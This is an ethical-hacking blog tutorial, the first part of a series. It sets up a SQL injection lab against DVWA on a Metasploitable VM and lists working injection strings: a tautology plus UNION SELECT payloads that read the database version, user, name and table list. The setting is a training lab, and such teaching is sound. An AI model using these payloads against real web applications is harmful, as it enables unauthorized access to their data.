sqlinjection-150915073716-lva1-app6892-thumbnail-4

SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL


Hello Gurkhas ! ! !

By : Bijay Acharya  | Add him in Facebook here > https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial 

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://IP address of
    Metasploitable/dvwa/login.php
    3. Login with user name “admin” and password “password”
    4. Click on DVWA Security and set it to low then submit
    5. Click on manual SQL injection
    6. On User ID box type 1 and Submit
    (Php select statement: $getid = “SELECT first_name, last_name FROM
    users WHERE user_id = ‘$id’”;)
    7. %’ or ‘0’=’0
    (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
    ‘0’=’0′;)
    8. Get DB version: %’ or 0=0 union select null, version() #
    9. Get DB user: %’ or 0=0 union select null, user() #
    10. Get DB name: %’ or 0=0 union select null, database() #
    11. Get Schima information: %’ and 1=0 union select null, table_name from
    information_schema.tables #
  • MORE here > http://lab.hcnepal.com/2016/08/24/sql-injection-lab-pt-1-introlab-setup-hc-nepal/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s